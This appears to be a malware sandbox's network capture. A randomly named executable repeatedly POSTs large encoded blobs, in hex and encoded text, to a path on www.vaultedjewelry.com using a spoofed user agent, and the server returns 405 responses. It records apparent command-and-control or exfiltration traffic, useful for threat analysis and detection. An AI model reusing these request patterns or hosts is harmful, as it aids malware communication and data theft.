                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 67 4c 45 68 75 53 71 34 50 39 53 58 51 42 2f 62 69 59 63 56 68 57 4a 59 2f 7a 49 44 30 73 4f 6b 52 6d 63 6f 73 56 69 52 2b 4b 48 30 4a 73 77 31 50 36 67 54 47 68 6b 42 64 49 69 53 41 64 42 31 69 6e 6a 44 56 61 78 58 42 53 45 6a 48 4e 39 37 70 61 68 54 6f 31 56 31 5a 39 67 44 37 31 6d 61 6c 59 32 34 6e 4e 44 33 54 51 39 69 63 61 76 75 5a 50 31 52 4f 55 2f 50 79 6e 56 54 49 53 71 4e 6e 61 4a 50 2b 47 6c 4e 54 51 67 2f 5a 6b 6f 54 44 49 56 35 6a 5a 50 4f 2f 56 4f 6d 35 72 78 70 4d 6a 41 6e 43 6e 6d 64 7a 4c 74 79 43 2f 77 5a 56 2f 6d 52 79 78 77 54 61 33 36 58 54 6f 53 70 54 51 50 57 76 4e 66 50 66 59 6d 5a 6b 6e 34 48 6f 6f 4c 57 50 76 4a 76 6d 33 65 52 74 2f 44 53 49 48 58 41 2f 56 63 4a 65 5a 59 61 45 36 32 48 32 6e 59 38 72 30 35 55 72 61 45 5a 66 44 65 50 4f 65 42 67 75 56 64 77 44 7a 59 49 55 51 6d 34 6d 67 32 32 67 34 33 4e 63 74 4c 4e 7a 38 70 6d 2b 66 32 72 33 61 73 39 56 41 42 66 6d 6b 33 4f 6d 6e 4a 38 44 65 38 51 44 49 2f 53 6b 71 4f 4b 62 36 4a 63 6a 4d 33 43 37 51 74 2f 63 2f 67 51 2b 5a 4f 72 50 31 74 69 7a 32 6e 77 56 63 6d 49 66 63 55 4c 42 39 7a 55 70 4c 73 76 59 76 47 48 62 4d 72 39 57 48 68 72 6e 6a 37 32 41 44 68 75 33 50 43 34 31 56 74 38 61 62 57 6d 6c 41 68 45 4f 62 51 77 78 58 6b 4b 4f 42 49 36 68 4c 47 65 46 77 38 41 33 42 30 55 58 6e 72 38 4e 58 44 50 52 54 36 59 48 53 4b 44 54 74 57 2f 68 37 77 52 31 6f 54 62 4d 49 37 56 4d 2b 4c 66 55 50 6e 46 2f 38 77 58 4f 47 7a 46 2f 53 34 62 45 42 44 4f 62 53 7a 57 55 6d 42 4f 5a 49 6b 72 4f 75 4b 79 30 50 6e 78 67 57 65 55 56 46 50 68 61 46 6f 35 37 77 37 72 36 4d 3d
                                                                                                                              Data Ascii: TZd=JgLEhuSq4P9SXQB/biYcVhWJY/zID0sOkRmcosViR+KH0Jsw1P6gTGhkBdIiSAdB1injDVaxXBSEjHN97pahTo1V1Z9gD71malY24nND3TQ9icavuZP1ROU/PynVTISqNnaJP+GlNTQg/ZkoTDIV5jZPO/VOm5rxpMjAnCnmdzLtyC/wZV/mRyxwTa36XToSpTQPWvNfPfYmZkn4HooLWPvJvm3eRt/DSIHXA/VcJeZYaE62H2nY8r05UraEZfDePOeBguVdwDzYIUQm4mg22g43NctLNz8pm+f2r3as9VABfmk3OmnJ8De8QDI/SkqOKb6JcjM3C7Qt/c/gQ+ZOrP1tiz2nwVcmIfcULB9zUpLsvYvGHbMr9WHhrnj72ADhu3PC41Vt8abWmlAhEObQwxXkKOBI6hLGeFw8A3B0UXnr8NXDPRT6YHSKDTtW/h7wR1oTbMI7VM+LfUPnF/8wXOGzF/S4bEBDObSzWUmBOZIkrOuKy0PnxgWeUVFPhaFo57w7r6M=
                                                                                                                              Dec 4, 2023 15:28:55.658785105 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:55 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              100192.168.11.205023191.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:28:58.179045916 CET5198OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 4a 67 4c 45 68 75 53 71 34 50 39 53 58 51 42 2f 62 69 59 63 56 68 57 4a 59 2f 7a 49 44 30 73 4f 6b 52 6d 63 6f 73 56 69 52 2b 79 48 31 38 34 77 30 6f 57 67 4a 47 68 6b 64 4e 49 5a 53 41 64 4d 31 69 66 64 44 56 57 68 58 43 71 45 67 51 4a 39 36 66 75 68 57 6f 31 55 70 4a 39 69 48 37 31 79 61 6c 63 45 34 6e 70 35 32 6a 6b 39 77 50 53 76 70 6f 4f 6a 5a 2b 55 44 50 79 6d 48 43 34 54 56 4e 6e 57 5a 50 2b 4b 6c 4e 51 30 67 39 71 4d 6f 52 30 6b 56 30 54 5a 49 48 66 56 64 76 5a 72 45 70 4d 66 75 6e 43 6d 54 64 78 6e 74 79 46 4c 77 61 53 72 68 51 53 78 77 61 36 33 35 42 6a 30 57 70 51 6c 61 57 73 52 66 50 59 6b 6d 59 45 6e 34 4d 71 41 55 52 76 76 51 2b 57 32 47 63 4e 44 62 53 49 6a 44 41 39 35 63 4a 76 39 59 49 6e 53 32 46 58 6e 59 31 72 30 2f 51 72 61 54 58 50 44 43 50 4f 4f 33 67 71 6b 6f 77 42 2f 59 49 31 77 6d 7a 6b 59 31 69 51 34 78 51 73 74 6b 47 54 77 39 6d 2b 50 63 72 33 61 38 39 55 45 42 66 58 55 33 50 6b 50 4b 78 7a 66 56 4a 7a 49 51 4a 30 32 2b 4b 62 32 33 63 67 63 6e 43 34 63 74 38 38 2f 67 56 5a 74 4a 35 66 31 71 39 6a 32 4c 75 6c 64 6b 49 66 51 2b 4c 41 34 47 55 5a 58 73 75 6f 2f 47 44 4c 4d 6f 34 32 48 6c 68 48 6a 78 67 77 44 68 75 33 43 78 34 31 52 74 2f 6f 4c 57 6b 58 6f 68 55 4e 44 51 79 78 57 76 4b 4f 42 56 36 68 48 31 65 46 34 57 41 33 78 61 55 52 58 72 39 63 6e 44 4d 54 37 35 64 33 53 50 48 54 74 46 37 68 32 77 52 30 41 6c 62 4d 5a 47 56 62 4f 4c 52 33 6e 6e 58 50 38 76 52 75 47 30 43 2f 53 79 66 45 4d 43 4f 62 4f 6a 57 55 53 6f 4f 61 49 6b 76 61 2f 65 76 32 62 4c 6a 43 65 44 4b 51 68 64 6e 34 56 41 39 70 77 64 77 4b 2f 37 59 32 6e 58 64 58 76 43 65 79 34 44 64 45 41 53 48 38 65 72 4c 53 42 30 66 50 73 58 6c 37 4d 49 68 6d 50 4c 4a 38 32 51 2f 42 63 2b 5a 39 46 36 57 62 4e 6e 31 6e 46 45 63 6f 43 54 53 43 70 42 53 64 47 48 57 78 65 65 48 56 72 75 75 62 70 52 35 44 72 65 4f 56 63 48 4a 64 38 54 62 35 41 72 55 59 73 62 77 4e 6f 62 61 39 38 6f 77 71 34 4b 6d 42 36 4d 73 37 2f 30 50 65 58 74 4d 78 62 65 48 71 68 49 72 77 5a 59 32 52 70 6d 31 44 56 45 4d 42 69 66 32 33 61 4c 41 53 6d 50 47 32 43 4f 6e 48 39 44 45 59 76 51 39 78 79 38 48 33 44 59 31 63 70 39 6c 2f 44 69 64 52 38 54 45 37 64 37 64 30 56 77 5a 55 32 51 71 35 69 51 78 71 48 75 6a 4c 71 57 74 57 53 31 4e 55 6e 4f 43 4c 49 58 57 70 47 79 73 67 41 36 46 76 65 50 68 67 61 4d 4d 54 4d 41 57 41 49 76 32 48 37 6c 38 78 38 61 41 58 43 76 75 35 61 47 4d 41 6a 36 79 71 65 73 38 72 62 41 65 57 78 35 63 38 49 58 49 46 45 7a 56 6a 75 4f 4e 37 6e 47 6f 6d 49 37 74 67 79 62 6d 76 4f 35 58 2f 4a 2b 31 53 2f 50 56 35 55 50 5a 64 36 6a 55 41 6d 65 33 55 32 32 2b 75 77 6a 33 4f 61 79 66 53 36 53 47 36 51 4f 77 41 6b 36 68 58 55 45 71 37 6e 73 73 69 4e 74 37 48 6c 54 65 48 32 74 50 61 37 32 2f 6e 46 72 2b 48 39 50 48 36 53 38 56 48 62 58 58 5a 76 49 53 59 69 46 32 37 39 42 68 38 46 76 58 5a 30 31 4e 50 6f 71 44 30 49 72 45 30 48 35 68 6b 59 6c 48 47 4d 49 6c 6a 4f 53 72 46 59 66 31 38 47 73 7a 2b 70 53 31 72 55 41 51 75 75 48 41 66 6a 70 53 30 51 4a 32 48 34 47 54 78 36 6a 6b 2b 4b 44 6a 34 75 42 78 44 63 65 6c 4f 53 61 47 53 69 7a 69 32 6f 4b 2b 32 54 41 54 74 69 39 79 4a 4a 52 79 77 2b 6c 52 67 72 4f 32 77 51 63 52 71 54 75 30 64 77 35 38 50 6f 6b 76 62 65 78 72 4a 4b 4a 45 56 5a 6d 67 74 77 38 37 54 77 49 6b 55 5a 65 50 6b 7a 6d 6b 6b 64 53 54 50 33 37 2f 4c 59 72 34 30 49 68 47 70 43 35 4d 6a 63 58 73 46 2f 42 75 43 73 52 4c 39 47 38 38 45 55 73 30 31 68 67 57 32 71 69 50 5a 34 4c 58 77 55 67 53 35 7a 32 68 38 69 61 5a 43 73 59 50 57 56 39 56 66 61 4e 71 31 79 6b 4a 42 34 4b 4a 79 2b 66 77 44 48 74 43 39 47 52 4e 56 70 4d 68 73 61 70 34 61 75 31 5a 73 4e 51 41 62 7a 4b 39 4f 37 42 54 6d 72 4e 4e 32 43 66 6c 47 6a 78 66 6e 47 6f 50 6a 70 75 54 59 36 7a 77 52 41 58 67 4e 77 46 53 75 73 70 59 61 4a 6a 36 69 6b 41 33 77 54 76 79 39 6b 62 44 52 2b 62 59 75 47 65 57 48 55 51 4a 73 4c 59 62 73 33 35 46 31 6a 32 78 70 75 39 6c 4e 30 34 4d 57 49 6c 38 52 30 51 64 53 6c 2b 68 77 48 66 65 48 34 64 36 52 42 71 42 6e 65 49 4c 5a 53 4b 4b 76 48 38 56 71 73 53 71 7a 74 67 59 6e 33 77 67 53 2b 35 69 61 79 4c 4d 30 5a 54 59 47 37 4a 49 61 44 39 2f 74 5a 34 36 39 2b
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:28:58.179133892 CET7770OUTData Raw: 31 61 6d 33 52 4b 69 47 6e 4f 6c 68 6d 71 71 2b 78 4d 32 6a 53 74 68 54 6d 41 51 47 2b 66 63 44 5a 52 2f 78 4c 30 30 6f 2b 6c 53 31 50 56 6b 5a 38 79 71 31 62 79 2b 44 57 68 57 74 56 46 48 73 6d 6d 62 67 57 63 2f 34 66 36 74 55 44 35 71 32 47 65
                                                                                                                              Data Ascii: 1am3RKiGnOlhmqq+xM2jSthTmAQG+fcDZR/xL00o+lS1PVkZ8yq1by+DWhWtVFHsmmbgWc/4f6tUD5q2GeMYfzfWVQtS+rSGqUgtqNi+gVlRFwPNBTUpVlSswIKsSOucvhCSnCVJyo/2YGaIxLT7VC969BjjtPa/9W0BrTHJEatS/jZjb48/7FPMlUgPCYDrbt5f93TWuL3AvFcYqJEJZsnH7Ycs/1fK6uxgibHQLk189Fn0tFH
                                                                                                                              Dec 4, 2023 15:28:58.361839056 CET6484OUTData Raw: 35 2f 45 74 36 53 51 44 32 76 76 38 63 4c 2b 73 6b 34 34 69 42 64 69 54 52 57 7a 6a 66 2f 49 55 76 56 55 74 56 70 45 4f 61 4e 62 42 79 6c 63 4b 4a 53 41 54 75 39 49 52 6f 68 42 4f 79 48 36 39 54 78 70 4b 6a 64 36 59 6d 7a 34 72 55 53 32 4b 4d 34
                                                                                                                              Data Ascii: 5/Et6SQD2vv8cL+sk44iBdiTRWzjf/IUvVUtVpEOaNbBylcKJSATu9IRohBOyH69TxpKjd6Ymz4rUS2KM4TVhi/ijMv4qnzBwUcbue3E0Y99kLNySg4tRlZ1rJXiVvWznT3H1ib9vn2D2m5l7CMe9hI6l0FInuOVI1+WyXtColgpgQiuJ8UMRjBWMQCNjgHCSa9h5riprLlyYnbgASCFMr8Pf4LJmDK9j6N/aVY2/vCyaGIVV4W
                                                                                                                              Dec 4, 2023 15:28:58.361949921 CET1340OUTData Raw: 43 34 34 67 66 56 69 5a 42 31 4f 58 7a 63 34 4f 58 58 67 34 38 2f 47 68 48 6f 70 6e 46 44 49 54 47 44 4a 5a 2f 6b 4b 5a 56 72 50 38 75 66 71 63 30 58 77 6d 6a 38 48 7a 2b 43 4a 45 78 72 55 39 45 46 53 6e 48 6e 63 71 70 64 57 4c 50 4a 4c 33 7a 38
                                                                                                                              Data Ascii: C44gfViZB1OXzc4OXXg48/GhHopnFDITGDJZ/kKZVrP8ufqc0Xwmj8Hz+CJExrU9EFSnHncqpdWLPJL3z8h2cyIhhsKKMYIdvQUN/Z1tEAcIZ6d9MQVI7tmtT3zREBx2uEcqwvtju5PXYaarTiXqFc0CPUpn0Boya/CMRksMwelP7v1Jsearn2A5hg2jyEDEVAt2C8tegJpzHkfxk6m0UvvzvdTjINljas0e4nSGSmFIgf4LQDl
                                                                                                                              Dec 4, 2023 15:28:58.362132072 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:58 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                                                                              Dec 4, 2023 15:28:58.362137079 CET2626OUTData Raw: 69 62 58 37 4a 5a 6b 63 6b 58 64 2b 31 4e 49 33 46 67 34 4e 38 62 55 6c 6f 5a 4e 54 43 6a 63 63 43 51 6d 41 70 67 53 36 55 51 67 7a 78 6d 4c 6a 38 73 75 44 49 63 69 44 53 72 32 53 54 74 79 6d 61 39 32 41 48 70 36 7a 4c 56 69 41 63 71 4d 56 4d 77
                                                                                                                              Data Ascii: ibX7JZkckXd+1NI3Fg4N8bUloZNTCjccCQmApgS6UQgzxmLj8suDIciDSr2STtyma92AHp6zLViAcqMVMw2pn6odbzogTM69f1V+ddGvejWFsV+R+145VecwWSY0rrGmyNvJMuKDsJ3gReBQffc1Bh0ZJ+3MaCPM8k6jdukydhwnAr18/WY0XpMl7jMAkbyXizcOph9L9nBvxyFrpleUUTUz4FizvM0Rc6jjsh0Jydgld/G++Kk
                                                                                                                              Dec 4, 2023 15:28:58.362304926 CET1340OUTData Raw: 6a 4b 56 78 79 77 55 55 42 41 6b 73 4c 30 79 7a 4a 36 4f 58 41 51 61 6e 30 39 44 4b 4f 56 35 6a 45 49 67 31 42 39 61 67 72 2f 61 61 2b 6b 38 68 52 64 42 4e 5a 31 39 6f 51 35 68 4c 35 54 39 38 36 4d 74 4a 55 77 59 74 7a 63 45 37 67 73 34 70 50 33
                                                                                                                              Data Ascii: jKVxywUUBAksL0yzJ6OXAQan09DKOV5jEIg1B9agr/aa+k8hRdBNZ19oQ5hL5T986MtJUwYtzcE7gs4pP34ndCdN9MRSXi+1I8UBRcfqIV3d56LFYTlFya9feOCfk8PZ8fz9vcwZILtDBkun/Da7B00U7IMT4FvcIs/ezYROSEqdtg7KN2aeiJt4f+zbGkOzebFV1ic1GIiOxo9JzY+jTw0nAtTxhaF7WQGUHFCAnvSSLRp70Or
                                                                                                                              Dec 4, 2023 15:28:58.362477064 CET1340OUTData Raw: 73 76 64 50 2f 53 2f 55 49 75 4e 66 31 2f 46 51 66 6c 6d 65 76 68 78 51 6e 61 74 6d 39 51 2f 4d 56 75 70 37 69 4e 77 73 32 56 6d 52 7a 4a 39 6f 4b 6f 55 4f 6b 4a 72 63 6a 58 55 56 52 78 33 2f 76 4b 56 45 74 70 45 51 57 64 6d 77 44 57 71 4f 53 31
                                                                                                                              Data Ascii: svdP/S/UIuNf1/FQflmevhxQnatm9Q/MVup7iNws2VmRzJ9oKoUOkJrcjXUVRx3/vKVEtpEQWdmwDWqOS1SZLXC/CDQnWpLyv5kDoL+yEvaok+okt3w76zuvO4dJxZgGAoMSkk80rlLV9fdUEdA4WKGhHKtGAXLGeHzZjKjezDHg9cHoOyyUxxwm2b1dIq0xd+kGjOV0Ngoh9Ja9YXkYhVhfaJnT0HD/ugv0J/zEgfaVdUmitB8
                                                                                                                              Dec 4, 2023 15:28:58.362477064 CET1340OUTData Raw: 54 35 55 48 56 2f 68 39 49 78 69 2f 35 72 63 43 61 71 2f 70 5a 30 35 58 50 34 2f 50 47 75 73 32 66 71 75 6e 70 36 42 32 35 4c 52 49 56 4d 5a 57 74 37 72 62 79 42 48 75 75 56 44 34 5a 36 59 36 68 50 2b 36 5a 51 74 46 45 6c 4c 64 4d 72 2f 2f 58 73
                                                                                                                              Data Ascii: T5UHV/h9Ixi/5rcCaq/pZ05XP4/PGus2fqunp6B25LRIVMZWt7rbyBHuuVD4Z6Y6hP+6ZQtFElLdMr//XsoFHdi4UdQNrZS3/J7ssm/KoYQHJHjdBZoBkeossDysMN21r2At+jZVufSACA9OYkk53wVwwxXmLK5MI63rWcmfIM6OxaXMqKhyw6bJTGKwng8A6WMbDj4kvrW6ktWcUYXyTjpnPZ55CRYrMbrOdOXCu3wdMigUVjI
                                                                                                                              Dec 4, 2023 15:28:58.362657070 CET11628OUTData Raw: 5a 61 4a 62 6c 64 45 62 6e 54 58 42 52 2b 46 38 6c 6a 77 71 35 65 6b 37 6f 48 6e 35 69 65 76 34 56 61 63 4f 70 62 4a 63 6c 66 53 75 4d 6e 44 6c 76 2b 34 35 69 67 33 72 76 65 5a 46 6a 54 4c 4c 41 5a 45 55 52 4b 47 38 31 39 5a 73 62 36 46 37 76 79
                                                                                                                              Data Ascii: ZaJbldEbnTXBR+F8ljwq5ek7oHn5iev4VacOpbJclfSuMnDlv+45ig3rveZFjTLLAZEURKG819Zsb6F7vywljzGlHwwd7vjL1N0Xl2+bNxdXSDOFl+tpAzglbYyMN+SP4dEOh5cCyIVFLZGYKpAl0zgav9ASjNYMnM+cSM1oOMXNkomtq+1axArLWdsGDafsq8+iq+/BW74WBRBj3P2cHmPKkyXAlwrM5X51IRmDfrbuO3tOi2W
                                                                                                                              Dec 4, 2023 15:28:58.544811964 CET9056OUTData Raw: 41 4c 55 4f 4d 50 52 36 62 4b 54 59 6c 56 5a 61 5a 53 2f 44 74 56 63 73 6e 69 4b 6c 4b 67 41 61 41 77 43 68 46 76 32 69 5a 35 42 63 55 41 75 6f 2b 34 78 5a 53 41 50 30 4e 4c 42 57 65 41 62 62 7a 70 6f 6b 50 37 77 70 68 4e 73 78 61 73 53 64 44 6e
                                                                                                                              Data Ascii: ALUOMPR6bKTYlVZaZS/DtVcsniKlKgAaAwChFv2iZ5BcUAuo+4xZSAP0NLBWeAbbzpokP7wphNsxasSdDniZBIZ4DNLpVAMNkThf4d+HwXxLlkiKEN7L0TKJXUjEuk7wSpPpcJAUk9sW+M7Ut7zGpcPXtITdrDLUACqKHnuwPaxm3/bQC9IVuLXeA+N/lXJBOvJYEVWBvgrzKlDItSaftNWj9G/TK1vlUNurewDsyxvou+D0efJ
